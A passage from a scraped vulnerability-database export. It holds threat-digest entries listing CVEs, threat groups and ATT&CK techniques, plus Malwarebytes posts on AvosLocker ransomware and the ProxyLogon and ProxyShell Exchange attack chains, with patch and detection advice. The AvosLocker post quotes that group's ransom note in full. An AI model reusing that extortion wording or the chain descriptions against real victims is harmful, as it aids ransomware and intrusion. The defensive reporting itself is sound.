Service T1486: Data Encrypted for Impact T1588.005: Exploits T1566: Phishing T1059.007: JavaScript T1136.002: Domain Account T1543: Create or Modify System Process T1140: Deobfuscate/Decode Files or Information T1003: OS Credential Dumping T1135: Network Share Discovery T1021: Remote Services T1560.001: Archive via Utility T1071.001: Web Protocols T1496: Resource Hijacking T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.001: PowerShell T1053: Scheduled Task/Job T1068: Exploitation for Privilege Escalation T1562: Impair Defenses T1003.005: Cached Domain Credentials T1057: Process Discovery T1021.001: Remote Desktop Protocol T1005: Data from Local System T1105: Ingress Tool Transfer T1566.002: Spearphishing Link T1059.003: Windows Command Shell T1053.005: Scheduled Task T1053: Scheduled Task/Job T1562.001: Disable or Modify Tools T1018: Remote System Discovery T1021.002: SMB/Windows Admin Shares T1113: Screen Capture T1078: Valid Accounts T1106: Native API T1078: Valid Accounts T1053.005: Scheduled Task T1070: Indicator Removal on Host T1518: Software Discovery T1021.006: Windows Remote Management T1078.002: Domain Accounts T1053: Scheduled Task/Job T1078.002: Domain Accounts T1078: Valid Accounts T1553: Subvert Trust Controls T1518.001: Security Software Discovery T1053.005: Scheduled Task T1078.002: Domain Accounts T1078: Valid Accounts T1049: System Network Connections Discovery T1204: User Execution T1078.002: Domain Accounts T1204.002: Malicious File T1047: Windows Management Instrumentation Threat Advisories: Bypass Authentication vulnerability in Atlassian Jira Seraph Hive Ransomware targets organizations with ProxyShell exploit Lazarus is back, targeting organizations with cryptocurrency thefts via TraderTraitor malware What will be the consequence of this disputed vulnerability in 7-ZIP?", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T12:44:38", "type": "hivepro", "title": "Weekly Threat Digest: 18 \u2013 24 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-0540", "CVE-2022-29072"], "modified": "2022-04-27T12:44:38", "id": "HIVEPRO:09525E3475AC1C5F429611A90182E82F", "href": "https://www.hivepro.com/weekly-threat-digest-18-24-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities: 340; Interesting Vulnerabilities: 10; Active Threat Groups: 5; Targeted Countries: 53; Targeted Industries: 24; ATT&CK TTPs: 84. The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities, of which 10 gained the attention of threat actors and security researchers worldwide. Among these 10, 1 is undergoing reanalysis and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. 
Lapsus$, a new extortion threat actor group that has attacked popular organizations such as the Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Okta, and Microsoft for data theft and destruction, was observed using the RedLine info-stealer. Additionally, the North Korean state-sponsored Lazarus group was exploiting a zero-day vulnerability in Google's Chrome web browser (CVE-2022-0609). AvosLocker, a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations, is currently exploiting the ProxyShell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35, aka Magic Hound, an Iranian-backed threat group, is exploiting the ProxyShell vulnerabilities to attack organizations across the globe. Another APT group, the South Korean DarkHotel, was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. 
Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse 
Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses 
T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat 
Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": 
"HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an [advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. 
The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. 
In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service, which of the vulnerabilities gets used may depend on the affiliate.\n\nThe Exchange Server vulnerabilities involved are CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). 
The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-16T10:27:50", "description": "Microsoft has detected multiple [zero-day](<https://blog.malwarebytes.com/glossary/zero-day/>) exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Microsoft attributes the attacks to a group they have dubbed Hafnium.\n\n> \u201cHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\u201d\n\n### The Hafnium attack group\n\nBesides a rare metal that chemically resembles zirconium, Hafnium is a newly identified attack group that is also thought to be responsible for other attacks on internet-facing servers, and typically exfiltrates data to [file sharing sites](<https://blog.malwarebytes.com/how-tos-2/2020/12/file-sharing-and-cloud-storage-sites-how-safe-are-they/>). 
Despite their use of leased servers in the US, the group is believed to be based in China (as most security researchers will tell you, attribution is hard, especially when it involves international espionage).\n\n### Exchange Server\n\nIn many organizations, internal cooperation depends on groupware solutions that enable the central administration of emails, calendars, contacts, and tasks. Microsoft Exchange Server is software that offers this functionality for Windows-based server systems.\n\nIn this case the attacker was using one of the zero-day vulnerabilities to steal the full contents of several user mailboxes from such servers.\n\n### Not one, but four zero-days\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The CVE\u2019s (with descriptions provided by Microsoft) used in these attacks were:\n\n * [**CVE-2021-26855**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26857**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26858**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. 
The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-27065**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n\nThey all look the same. Boring you said? Read on!\n\n### The attack chain\n\nWhile the CVE description is the same for the 4 CVE\u2019s we can learn from the report by the security firm that discovered the attacks, Volexity, that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The Remote Code Execution (RCE) vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws \u2014 CVE-2021-26858 and CVE-2021-27065 \u2014 would allow an attacker to write a file to any part of the server.\n\nTogether these 4 vulnerabilities form a powerful attack chain which only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\n### Urgent patching necessary\n\nEven though the use of the vulnerabilities was described as \u201climited\u201d, now that the information has been made public, we may see a quick rise in the number of attacks. 
Especially since the attack does not require a lot of information about the victim to start with.\n\nOr as Microsoft\u2019s vice president for customer security Tom Burt put it:\n\n> \u201cEven though we\u2019ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\u201d\n\nUsers of Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019 are advised to apply the updates immediately to protect against these exploits, prioritizing the externally facing Exchange servers.\n\nMicrosoft also advises that the initial stage of the attack can be stopped by "restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access", although the other parts of the attack chain can still be exploited, if other means of access are used.\n\n### Update March 4, 2021\n\nThe Cybersecurity and Infrastructure Security Agency issued an [emergency directive](<https://cyber.dhs.gov/ed/21-02/>) after CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange _on-premises_ products. The directive gives detailed instructions for agencies to follow immediately after identifying all instances of on-premises Microsoft Exchange Servers in their environment.\n\nFor readers that are interested in the more technical details of the attack chain, [Volexity published a blog](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) that provides details about their investigation and the vulnerabilities, and which also includes IOCs.\n\n### Update March 5, 2021\n\nIt turns out that [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) was discovered in December of 2020 by DEVCORE who named the vulnerability ProxyLogon. 
They called it [ProxyLogon](<https://proxylogon.com/>) because this bug targets the Exchange **Proxy** Architecture and **Logon** mechanism. After DEVCORE chained the bugs together to a workable pre-auth RCE exploit, they sent an advisory and exploit to Microsoft through the MSRC portal. The entire timeline can be found [here](<https://proxylogon.com/#timeline>).\n\n### Update March 8, 2021\n\nMicrosoft has released an [updated script that scans Exchange log files](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. The US Cybersecurity & Infrastructure Security Agency (CISA) has [issued a warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that it is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the script as soon as possible.\n\nMicrosoft has also added definitions to its standalone malware scanner, the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) (also known as the Microsoft Support Emergency Response Tool or MSERT), so that it detects web shells.\n\nMalwarebytes detects web shells planted on compromised Exchange servers as [Backdoor.Hafnium](<https://blog.malwarebytes.com/detections/backdoor-hafnium/>). 
You can read more about the use of web shells in Exchange server attacks in our article [Microsoft Exchange attacks cause panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>).\n\n### Update March 12, 2021\n\nThe abuse of these vulnerabilities has sky-rocketed, and the first public proof-of-concept (PoC) exploit for the ProxyLogon flaws has appeared on GitHub, only to be taken down by the site. In spite of Microsoft's efforts, cybercriminals have shown in numbers that they are exploiting this opportunity to the fullest.\n\nA new form of ransomware has also entered the mix. Detections for DearCry, a new form of human-operated ransomware that's deployed through compromised Exchange servers, began yesterday. When the ransomware was still unknown, it would have been detected by Malwarebytes proactively, as Malware.Ransom.Agent.Generic. \n\nYou can read more about DearCry ransomware attacks in our article [Ransomware is targeting vulnerable Microsoft Exchange servers](<https://blog.malwarebytes.com/ransomware/2021/03/ransomware-is-targeting-vulnerable-microsoft-exchange-servers/>).\n\n### Update March 16, 2021\n\nMicrosoft has released a new, one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\n\nDetails, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>). 
\n\nWe will keep you posted as we gather more information about these ransomware attacks.\n\nStay safe, everyone!\n\nThe post [Patch now! Exchange servers attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T12:34:27", "type": "malwarebytes", "title": "Patch now! Exchange servers attacked by Hafnium zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T12:34:27", "id": "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent 
warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. 
